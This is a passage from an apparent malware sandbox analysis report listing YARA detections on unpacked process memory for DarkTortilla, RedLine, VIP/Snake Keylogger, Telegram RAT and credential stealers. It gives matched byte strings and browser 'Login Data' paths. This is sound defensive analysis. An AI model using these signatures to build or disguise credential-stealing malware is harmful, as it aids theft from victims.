constructor or from DllMain.
16.2.xxlooa.exe.442f41a.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.442f41a.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
18.2.xxlooa.exe.414a812.0.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
19.2.AddInProcess32.exe.285fd6e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.2.AddInProcess32.exe.285fd6e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.File.com.exe.3bfaa72.2.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3bfaa72.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50080:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x83040:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33050:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x66010:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336d0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x66690:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d5a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x84d1a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x519a0:$s5: delete[] 0x84960:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e58:$s6: constructor or from DllMain. 0x83e18:$s6: constructor or from DllMain.
16.2.xxlooa.exe.442f41a.0.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
17.2.AddInProcess32.exe.2b5fd6e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.AddInProcess32.exe.2b5fd6e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e300:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d9a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc00:$a4: \Orbitum\User Data\Default\Login Data
17.2.AddInProcess32.exe.2b5fd6e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32192:$s1: UnHook 0x3212e:$s2: SetHook 0x32167:$s3: CallNextHook 0x320f6:$s4: _hook
18.2.xxlooa.exe.41b0772.2.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
18.2.xxlooa.exe.41b0772.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50066:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33036:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336b6:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x660d6:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d40:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51986:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e3e:$s6: constructor or from DllMain.
0.2.File.com.exe.3c60a02.5.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3c60a02.5.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.xxlooa.exe.43c948a.4.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.43c948a.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50080:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x83040:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33050:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x66010:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336d0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x66690:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d5a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x84d1a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x519a0:$s5: delete[] 0x84960:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e58:$s6: constructor or from DllMain. 0x83e18:$s6: constructor or from DllMain.
0.2.File.com.exe.3bfaa72.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3bfaa72.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f050:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6d0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
0.2.File.com.exe.3c2da42.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3c2da42.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50070:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33040:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336c0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d4a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51990:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e48:$s6: constructor or from DllMain.
16.2.xxlooa.exe.43fc45a.2.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.43fc45a.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50070:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33040:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336c0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d4a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51990:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e48:$s6: constructor or from DllMain.
16.2.xxlooa.exe.43fc45a.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.43fc45a.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f040:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6c0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
17.2.AddInProcess32.exe.2b60c8e.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
18.2.xxlooa.exe.40e4882.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.44c8330.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f120:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
18.2.xxlooa.exe.40e4882.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50080:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x83040:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33050:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x66010:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336d0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x66690:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d5a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x84d1a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x519a0:$s5: delete[] 0x84960:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e58:$s6: constructor or from DllMain. 0x83e18:$s6: constructor or from DllMain.
17.2.AddInProcess32.exe.2b60c8e.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc83:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cee0:$a4: \Orbitum\User Data\Default\Login Data
17.2.AddInProcess32.exe.2b60c8e.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31472:$s1: UnHook 0x3140e:$s2: SetHook 0x31447:$s3: CallNextHook 0x313d6:$s4: _hook
17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x354ca:$a1: get_encryptedPassword 0x3549e:$a2: get_encryptedUsername 0x35562:$a3: get_timePasswordChanged 0x3547a:$a4: get_passwordField 0x354e0:$a5: set_encryptedPassword 0x352ad:$a7: get_logins 0x30b01:$a10: KeyLoggerEventArgs 0x30ad0:$a11: KeyLoggerEventArgsEventHandler 0x35381:$a13: _encryptedPassword
17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e883:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eae0:$a4: \Orbitum\User Data\Default\Login Data 0x3f4bf:$a5: \Kometa\User Data\Default\Login Data
17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33072:$s1: UnHook 0x3300e:$s2: SetHook 0x33047:$s3: CallNextHook 0x32fd6:$s4: _hook
18.2.xxlooa.exe.40e4882.1.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
18.2.xxlooa.exe.40e4882.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f050:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6d0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
0.2.File.com.exe.3c60a02.5.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.5ce0000.7.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3eaecf0.4.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
17.2.AddInProcess32.exe.2cb0000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.AddInProcess32.exe.2cb0000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.AddInProcess32.exe.2cb0000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.AddInProcess32.exe.2cb0000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.AddInProcess32.exe.2cb0000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x363ea:$a1: get_encryptedPassword 0x363be:$a2: get_encryptedUsername 0x36482:$a3: get_timePasswordChanged 0x3639a:$a4: get_passwordField 0x36400:$a5: set_encryptedPassword 0x361cd:$a7: get_logins 0x31a21:$a10: KeyLoggerEventArgs 0x319f0:$a11: KeyLoggerEventArgsEventHandler 0x362a1:$a13: _encryptedPassword
17.2.AddInProcess32.exe.2cb0000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40100:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f7a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa00:$a4: \Orbitum\User Data\Default\Login Data 0x403df:$a5: \Kometa\User Data\Default\Login Data
